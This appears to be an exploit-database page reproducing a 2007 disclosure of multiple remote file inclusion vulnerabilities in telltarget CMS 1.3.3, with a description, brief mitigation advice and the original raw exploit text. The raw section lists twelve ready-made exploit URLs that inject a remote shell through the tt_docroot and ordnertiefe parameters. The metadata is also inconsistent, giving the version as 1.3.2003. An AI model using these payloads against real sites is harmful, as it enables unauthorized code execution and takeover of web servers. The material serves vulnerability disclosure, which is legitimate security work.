telltarget CMS 1.3.3 - exploit.company

vendor:

telltarget CMS

by:

GolD_M = [Mahmood_ali]

7.5

CVSS

HIGH

Multiple Remote File Inclusion

Not available

CWE

Product Name: telltarget CMS

Affected Version From: 1.3.2003

Affected Version To: 1.3.2003

Patch Exists: NO

Related CWE: Not available

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Not available

2007

telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie

The telltarget CMS 1.3.3 version is vulnerable to multiple remote file inclusion vulnerabilities. Attackers can exploit these vulnerabilities by injecting malicious code into certain PHP scripts, allowing them to include and execute arbitrary files from remote servers. The specific vulnerable paths include /phplib/site_conf.php, /phplib/version/1.3.3/functionen/class.csv.php, /phplib/version/1.3.3/functionen/produkte_nach_serie.php, /phplib/version/1.3.3/functionen/ref_kd_rubrik.php, /phplib/version/1.3.3/module/hg_referenz_jobgalerie.php, /phplib/version/1.3.3/module/surfer_anmeldung_NWL.php, /phplib/version/1.3.3/module/produkte_nach_serie_alle.php, /phplib/version/1.3.3/module/surfer_aendern.php, /phplib/version/1.3.3/module/ref_kd_rubrik.php, /phplib/version/1.3.3/module/referenz.php, /phplib/version/1.3.3/standard/1/lay.php, /phplib/version/1.3.3/standard/3/lay.php. These vulnerabilities can be exploited by an attacker to execute arbitrary code and potentially gain unauthorized access to the affected system.

Mitigation:

To mitigate these vulnerabilities, users are advised to update to a patched version of telltarget CMS that addresses the file inclusion issues. It is also recommended to regularly update the CMS and apply security patches as they become available.

Source

Exploit-DB raw data:

# telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie
# D.Script: http://www.telltargetcms.de/download/telltarget_1.3.3.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
# Greetz To: Tryag-Team ....&&&

# milw0rm.com [2007-05-09]